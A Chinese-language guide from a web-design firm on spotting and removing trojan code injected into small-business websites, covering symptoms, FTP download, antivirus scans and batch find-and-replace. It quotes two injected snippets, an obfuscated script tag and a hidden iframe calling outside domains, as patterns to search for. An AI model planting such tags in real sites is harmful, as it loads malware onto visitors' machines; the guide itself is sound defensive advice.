木马横行的网络时代，企业网站如何能独善其身?

现在网络安全问题很突出，像我们中小企业的网站由于技术维护人员少，很容易被一些黑客攻击植入一些木马程序.出现了这种情况，使客户害怕而不再访问我们的网站，就会丧失一些交易的机会.三原色创意科技为您提供一些简单的判断方法.

如何发现网页产生木马？

1.打开网页超慢，并弹出一些其他网站的窗口.
2.杀毒软件，或是一些查杀木马的软件，会弹出窗口报警.
3.IE等浏览器的地址栏里会闪出一些陌生的网址.

如何查杀木马？

1.首先需要您学会使用FTP软件去管理自已的网站.　如果您的网站放在独立服务器上采用远程管理也是可以的.（三原色创意科技提示说这个意思是首先你能改得了互联网上您网站上的文件内容.）
2.把网页文件下载到本地.（前提也是通过FTP软件.）
3.采用卡巴期基，Ewido等安全软件进行查杀.（三原色提示：有些嵌入的iframe木马往往杀不出来）

三原色提示：

有些木马用杀毒软件也杀不了，因为他不是病毒是一个代码。所以需要手动批量删除（见下文）。不过最根本解决方法，要解决您网站上存在的漏洞。要仔细检查，否则还会容易中招。

如何手工查看网页代码来检查木马？

1.对于有些查不出来的木马，首先您下载您网站文件的首页网页文件.一般都是index.htm,index.html,index.asp,index.php,default.htm,defult.html,default.asp,defult.php等等.
2.然后这些文件一般可以使用记事本打开.
3.在打开的文件中查找有没有类似的代码（三原色提示：往往在最开始或者最结尾出现的几率）：
<script src=http://%76%63%63%64%2E%63%6E></script>
或者
<iframe src=http://www.900p8d.info/xm47.htm

如图，最后两行是木马代码：特征是经<script></script>或者<ifarme></ifarme>包围.都有http://，后面的要么就是可疑网址，要么就是不是明文的加密代码.
4.如果有删除它们即可以，三原色提示：删除的时候一要注意将<script>...</script>和<iframe>....</iframe> 中间的连同两边这个标签符号完整地删除掉.
5.用FTP软件上传到服务器上看是否显示正常.
6.如果正常，建议把网站文件整体下载到本地，然后查找所有的文件中有没有包含这个恶意代码即可.

批量查杀木马的方法：

1.采用window中的查找功能：

如图，文件名中输入*.*，意思查找全部文件，文件中包含我们找到的木马代码，搜索范围一般选择我们的网站文件夹即可，点击查找就会知道，到底有多少文件被感染.

2.采用批量替字符软件，批量删除木马
比如：UltraEdit-32 文本编辑器 等批量替换文件中的木马代码.

木马查杀实例：

本站文章其他文章　一个菜鸟清除网站木马的经历

三原色创意科技原创：欢迎转载，请标注出处：syscy.com